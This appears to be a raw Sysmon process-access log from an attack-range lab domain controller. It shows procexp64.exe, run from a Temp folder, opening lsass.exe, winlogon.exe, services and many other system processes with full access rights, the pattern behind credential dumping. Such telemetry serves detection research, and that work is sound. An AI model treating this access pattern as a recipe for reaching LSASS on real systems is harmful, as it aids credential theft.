15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785653Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785652Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785651Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785650Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785649Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785648Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785647Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785646Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785645Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785644Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785643Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785642Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785641Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785640Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785639Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785638Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785637Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785636Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785635Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785634Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785633Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785632Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785631Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785630Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785629Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785628Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785627Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785626Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785625Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785624Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785623Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785622Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785621Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785760Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785759Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785758Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785757Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785756Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 